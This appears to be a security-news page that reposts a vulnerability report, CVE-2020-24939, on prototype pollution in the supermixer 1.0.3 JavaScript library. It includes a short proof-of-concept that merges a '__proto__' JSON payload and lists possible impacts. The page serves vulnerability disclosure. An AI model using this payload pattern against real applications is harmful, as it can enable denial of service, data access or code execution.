Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-24939: Prototype pollution · Issue #9 · stampit-org/supermixer

Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.

CVE
#vulnerability#js#java#rce

I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.

Vulnerability Description:

Prototype Pollution is a vulnerability affecting JavaScript, Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects.

Proof of Concept:

var mixer = require(‘supermixer’); var payload = '{"__proto__":{"poc":"evil"}}’; var test = {}; console.log("Before: ", test.poc); mixer.merge({},JSON.parse(payload)); console.log("After: ", test.poc);

Impact :

DoS, Access to restricted data, RCE (depends on implementation)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907